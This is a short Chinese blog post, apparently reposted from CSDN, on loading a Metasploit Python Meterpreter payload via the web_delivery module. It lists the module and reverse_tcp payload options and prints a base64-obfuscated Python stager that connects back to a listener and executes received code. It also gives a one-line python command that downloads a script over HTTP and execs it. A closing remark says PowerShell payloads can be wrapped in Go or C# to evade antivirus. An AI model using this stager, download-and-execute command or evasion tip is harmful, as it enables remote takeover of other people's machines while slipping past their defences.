Pyhton載入MeterpreterWeb_delivery程式碼

神棍先生發表於2017-08-25

Web

版權宣告：本文可能為博主原創文章，若標明出處可隨便轉載。 https://blog.csdn.net/Jailman/article/details/77574162

Webdelivery的options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description

—- ————— ——– ———–

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLCert no Path to a custom SSL certificate (default is randomly generated)

URIPATH /test no The URI to use for this exploit (default is random)

Payload options (python/meterpreter/reverse_tcp):

Name Current Setting Required Description

—- ————— ——– ———–

LHOST 127.0.0.1 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

— —-

0 Python

生成的檔案內容

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,`UTF-8`)}[sys.version_info[0]](`aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxMjcuMC4wLjEnLDQ0NDQpKQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK`)))

呼叫命令

python -c “import urllib2; r = urllib2.urlopen(`http://127.0.0.1:8080/test`); exec(r.read());”

使用PowerShell執行的payload語句可以封裝到golang或者C#中實現免殺的目的

Pyhton開發入門心得
2017-11-05
Vue程式碼分割懶載入
2017-11-16
Vue
遠端程式碼載入方案
2024-10-15
webpack懶載入程式碼原理深究
2020-11-12
Web
jQuery圖片預載入程式碼
2017-04-08
jQuery
canvas載入效果程式碼例項
2018-07-09
Canvas
Pyhton列印barcode及二維碼標籤
2015-04-06
動態載入javascript指令碼程式碼例項
2017-03-23
JavaScript指令碼
spring日誌載入程式碼解析
2017-03-16
Spring
js ajax惰性載入程式碼例項
2017-03-27
JS
js載入解析xml檔案程式碼
2017-04-12
JSXML
C#入門程式碼[轉載][收藏]
2007-03-06
C#
CSS3 loadding載入程式碼
2018-08-02
CSSS3
javascript圖片預載入程式碼例項
2017-03-09
JavaScript
js圖片預載入程式碼片段分享
2017-04-06
JS
jQuery載入進度條例項程式碼
2017-10-31
jQuery
CSS載入遠端字型例項程式碼
2017-02-22
CSS
UEFI載入程式
2018-08-13
【Hadoop】pyhton連結hive
2018-06-27
HadoopHive
Pyhton內建函式大全
2017-11-12
函式
webpack，非同步載入，程式碼分割，require.ensure
2020-02-28
Web非同步UI
JavaScript文件載入完成後再去執行程式碼
2018-08-07
JavaScript行程
js圖片緩衝載入程式碼例項
2017-03-10
JS
js動態載入外部css檔案程式碼
2017-04-06
JSCSS
Ajax程式碼執行前應該先載入jQuery
2024-07-15
jQuery
程式碼分割與懶載入情況下（code-splitting+lazyload）抽離懶載入模組的公用模組程式碼
2019-02-16
軟體安裝程式第二篇(載入程式原始碼）
2020-11-28
原始碼
小程式分包載入
2018-11-11
30行Javascript程式碼實現圖片懶載入
2021-09-09
JavaScript
外掛化之程式碼呼叫與載入資源
2018-11-08
不用寫程式碼也能做表單 —— 載入meta即可
2020-09-12
javascript動態載入css檔案程式碼例項
2017-04-04
JavaScriptCSS
jquery圖片預載入簡單程式碼例項
2017-04-05
jQuery
jQuery實現圖片預載入程式碼例項
2017-04-18
jQuery
利用函式的惰性載入提高 javascript 程式碼效能
2014-06-09
函式JavaScript
原生JS動態載入JS、CSS檔案及程式碼指令碼
2018-07-19
JSCSS指令碼
程式碼下載
2008-03-25
非阻塞載入指令碼
2013-05-18
指令碼

Pyhton載入MeterpreterWeb_delivery程式碼

相關文章